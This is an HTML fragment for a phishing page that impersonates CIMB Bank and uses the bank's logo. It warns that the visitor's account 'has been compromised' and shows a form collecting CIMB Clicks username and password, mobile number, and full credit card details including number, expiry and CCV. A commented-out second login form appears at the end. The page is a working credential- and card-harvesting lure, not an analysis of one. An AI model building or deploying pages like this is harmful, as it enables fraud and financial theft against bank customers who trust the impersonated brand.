<div class="container">

  <br>
  <img src="http://mrrados.com/wp-content/uploads/2012/03/Logo-CIMB-Bank-Converteda.png" height="50" width="300">

   <font size="3"><h1>Your CIMB Account Has Been Compromised!</h1>
  <p>Please enter your CIMB Clicks details</p>

  <form action="/cool_url" method="post">
    Username:<br>
    <input type="text" name="username">
    <br><br>
    Password:<br>
    <input type="text" name="password">
    <br><br>
    Mobile number:<br>
    <input type="text" name="mobile">
    <br><br>
    Credit card type:<br>
    <br>
    <input type="radio" name="option1" value="Visa" checked> Visa<br>
    <input type="radio" name="option2" value="MasterCard"> MasterCard<br>
    <input type="radio" name="option3" value="Amex"> Amex<br>
    <br>
    Credit card number:<br>
    <input type="text" name="cc">
    <br><br>
    Name on credit card:<br>
    <input type="text" name="ccname">
    <br><br>
    Credit card expiry:<br>
    <input type="text" name="expiry">
    <br><br>
    CCV number:<br>
    <input type="text" name="ccv">
    <br><br>
    Gender:<br>
    <input type="radio" name="group1" value="Gender" checked> Male<br>
    <input type="radio" name="group1" value="Gender"> Female<br>
    <br>


    <input type="submit" value="Submit">
    <br>
  </form>
    <br><br>
  <img src="http://a2.mzstatic.com/us/r1000/090/Purple/d7/8b/22/mzl.jkcqabvi.png" height="200" width="200">



 <!--  <p>Please enter your login and password so the whole world can see here</p>
  <form action="/cool_url" method="get">
    Username:<br>
    <input type="text" name="firstname" >
    <br>
    Password:<br>
    <input type="text" name="lastname">
    <br><br>
    <input type="submit" value="Submit">
    Comment here:<br>
    <textarea cols="40" rows="5" name="ICnumber">
    </textarea>
    <br><br>
  </form> -->
</div>
